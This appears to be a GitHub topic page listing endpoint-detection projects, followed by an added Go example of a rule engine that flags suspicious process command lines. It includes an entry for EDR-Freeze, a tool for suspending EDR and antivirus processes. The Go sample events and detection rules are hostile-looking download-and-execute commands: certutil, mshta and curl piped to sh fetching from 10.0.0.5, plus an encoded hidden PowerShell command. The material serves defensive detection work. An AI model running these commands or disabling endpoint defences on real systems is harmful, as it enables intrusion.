Open-source endpoint detection engine for Windows and Linux using ETW, eBPF, Sigma, YARA, IOCs, and ECS NDJSON alerts.
Updated Jun 1, 2026 - Rust
A complete speech segmentation system using Kaldi and x-vectors for voice activity detection (VAD) and speaker diarisation.
Experimental closed-loop EDR evaluation framework, automated artifact mutation, sandboxed execution, telemetry collection, and explainable triage. Understands why detections trigger. M.Sc. Cybersecurity thesis (EPFL, 2026).
Graph-powered EDR agent with LLM threat analysis, real-time IOC matching, and chain-aware response actions
Python-based security tool for detecting suspicious processes
Step-by-step guide to deploying a Wazuh SIEM/SOC home lab from the official OVA. Covers hypervisor networking, memory optimization for low-RAM systems, dashboard access, SSL troubleshooting, and Windows endpoint agent deployment, with full screenshots.
On a scale of one to America, this NextGen Norton Antivirus EDR just made enterprise-grade defense free. Built by a Norton, carrying forward a name rooted in cybersecurity history, reimagined for modern threats.
🚀 Suspend EDR and antivirus processes with EDR-Freeze, a user-mode Windows tool that does not depend on exploiting vulnerable kernel drivers.
I implemented a speech endpoint detector that figures out where words start and stop, using short-term energy and zero-crossing rate. Works on Persian and English.
Lightweight endpoint detection agent in Go. Process telemetry, YAML rule engine with name/cmdline/regex matching, JSON-lines alerts.
Cross-platform vibe-coded (probably badly made, but whatever) endpoint forensics suite. Dual SHA-256 + SHA3-256 hash-chained, ML-DSA-65-signed evidence.
Collection of scripts for Fidelis CyberSecurity EDR
Deployed Sysmon on Windows 10 with a custom XML ruleset to detect process creation, living-off-the-land (LOTL) techniques, and encoded PowerShell execution (MITRE ATT&CK T1059).
Endpoint triage system for detecting suspicious activity using Python, MITRE ATT&CK mapping, and HTML threat reports.
🔍 Detect threats with Rustinel, a high-performance Windows EDR agent that leverages ETW to collect telemetry and outputs alerts for easy SIEM integration.
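Several of the projects above describe the same core loop: collect process-creation telemetry, evaluate it against a rule file with name/cmdline/regex matchers, map hits to MITRE ATT&CK, and emit one JSON line per alert for a SIEM. The following is an added example of that loop, written for this page and not taken from any of the listed repositories. It assumes a flat rule document (JSON here so it needs only the Go standard library; the Go agent listed above uses YAML with the same field shape), ECS-style field names flattened to dotted keys, and constructed sample events (including an encoded-PowerShell command line and two certutil abuses). Rule IDs, the `ep-` prefix and the `-e[a-z]*` heuristic for PowerShell's `-EncodedCommand` prefixes are illustrative choices, not a published rule set.

```go
package main

import (
	"encoding/json"
	"fmt"
	"regexp"
	"strings"
	"time"
)

// ProcessEvent is the process-creation telemetry a collector (ETW, eBPF, /proc) hands to the engine.
type ProcessEvent struct {
	Timestamp time.Time
	PID, PPID int
	Image     string // full executable path
	Cmdline   string
}

// Rule fields under match are AND-ed and empty ones ignored: name is compared to the image
// basename case-insensitively, cmdline is a case-insensitive substring test, and regex is a
// Go regexp over the full command line (prefix (?i) for case-insensitive matching).
type Rule struct {
	ID        string `json:"id"`
	Title     string `json:"title"`
	Technique string `json:"technique"` // MITRE ATT&CK technique ID
	Match     struct{ Name, Cmdline, Regex string } `json:"match"`
	re        *regexp.Regexp
}

// Alert is one NDJSON line; keys are ECS field names flattened to dotted form (assumption).
type Alert struct {
	Timestamp string `json:"@timestamp"`
	RuleID    string `json:"rule.id"`
	RuleName  string `json:"rule.name"`
	Technique string `json:"threat.technique.id"`
	PID       int    `json:"process.pid"`
	PPID      int    `json:"process.parent.pid"`
	Image     string `json:"process.executable"`
	Cmdline   string `json:"process.command_line"`
}

// SampleRules is a constructed rule document for this example (hypothetical IDs).
const SampleRules = `[
 {"id":"ep-001","title":"Encoded PowerShell command","technique":"T1059.001",
  "match":{"name":"powershell.exe","regex":"(?i)(^|\\s)-e[a-z]*\\s+[A-Za-z0-9+/=]{16,}"}},
 {"id":"ep-002","title":"certutil download","technique":"T1105",
  "match":{"name":"certutil.exe","cmdline":"-urlcache"}},
 {"id":"ep-003","title":"certutil decode","technique":"T1140",
  "match":{"name":"certutil.exe","cmdline":"-decode"}},
 {"id":"ep-004","title":"mshta loading remote content","technique":"T1218.005",
  "match":{"name":"mshta.exe","regex":"(?i)https?://"}},
 {"id":"ep-005","title":"curl/wget piped to shell","technique":"T1059.004",
  "match":{"name":"bash","regex":"(?i)(curl|wget)\\b.*\\|\\s*(ba)?sh\\b"}}
]`

// SampleEvents are constructed process-creation events, not real telemetry.
func SampleEvents() []ProcessEvent {
	t := time.Date(2026, 6, 1, 12, 0, 0, 0, time.UTC)
	ev := func(pid int, image, cmd string) ProcessEvent {
		return ProcessEvent{Timestamp: t, PID: pid, PPID: 1000, Image: image, Cmdline: cmd}
	}
	ps := `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`
	return []ProcessEvent{
		ev(4101, ps, `powershell.exe -NoP -W Hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA`),
		ev(4102, ps, `powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1`), // benign
		ev(4103, `C:\Windows\System32\certutil.exe`, `certutil.exe -urlcache -split -f http://10.0.0.5/a.exe a.exe`),
		ev(4104, `C:\Windows\System32\certutil.exe`, `certutil.exe -decode a.b64 a.exe`),
		ev(4105, `C:\Windows\System32\mshta.exe`, `mshta.exe http://10.0.0.5/a.hta`),
		ev(4106, `/usr/bin/bash`, `bash -c "curl -s http://10.0.0.5/x.sh | sh"`),
		ev(4107, `C:\Windows\System32\notepad.exe`, `notepad.exe notes.txt`), // benign
	}
}

func baseName(p string) string { return strings.ToLower(p[strings.LastIndexAny(p, `/\`)+1:]) }

// LoadRules parses the document, compiles each regex once, and rejects rules with no criteria
// (an empty match would fire on every event).
func LoadRules(doc string) ([]*Rule, error) {
	var rules []*Rule
	if err := json.Unmarshal([]byte(doc), &rules); err != nil {
		return nil, err
	}
	for _, r := range rules {
		if r.Match.Name == "" && r.Match.Cmdline == "" && r.Match.Regex == "" {
			return nil, fmt.Errorf("rule %s: no match criteria", r.ID)
		}
		if r.Match.Regex != "" {
			re, err := regexp.Compile(r.Match.Regex)
			if err != nil {
				return nil, fmt.Errorf("rule %s: %w", r.ID, err)
			}
			r.re = re
		}
	}
	return rules, nil
}

func (r *Rule) matches(ev ProcessEvent) bool {
	if r.Match.Name != "" && baseName(ev.Image) != strings.ToLower(r.Match.Name) {
		return false
	}
	if r.Match.Cmdline != "" && !strings.Contains(strings.ToLower(ev.Cmdline), strings.ToLower(r.Match.Cmdline)) {
		return false
	}
	return r.re == nil || r.re.MatchString(ev.Cmdline)
}

// Run evaluates every rule against every event and returns one NDJSON line per hit.
func Run(rulesDoc string, events []ProcessEvent) ([]string, error) {
	rules, err := LoadRules(rulesDoc)
	if err != nil {
		return nil, err
	}
	var lines []string
	for _, ev := range events {
		for _, r := range rules {
			if !r.matches(ev) {
				continue
			}
			b, err := json.Marshal(Alert{Timestamp: ev.Timestamp.UTC().Format(time.RFC3339), RuleID: r.ID,
				RuleName: r.Title, Technique: r.Technique, PID: ev.PID, PPID: ev.PPID, Image: ev.Image, Cmdline: ev.Cmdline})
			if err != nil {
				return nil, err
			}
			lines = append(lines, string(b))
		}
	}
	return lines, nil
}

func main() {
	lines, err := Run(SampleRules, SampleEvents())
	if err != nil {
		panic(err)
	}
	for _, l := range lines {
		fmt.Println(l)
	}
}
```

Running it prints five alert lines (the two benign events produce none). The encoded-PowerShell regex deliberately requires a run of at least 16 base64 characters after the switch, which is why `-ExecutionPolicy Bypass` does not trip it; PowerShell accepts any unambiguous prefix of `-EncodedCommand`, so the `-e[a-z]*` form is a heuristic that a production rule set would tighten against the parent process and the decoded content rather than the switch spelling alone.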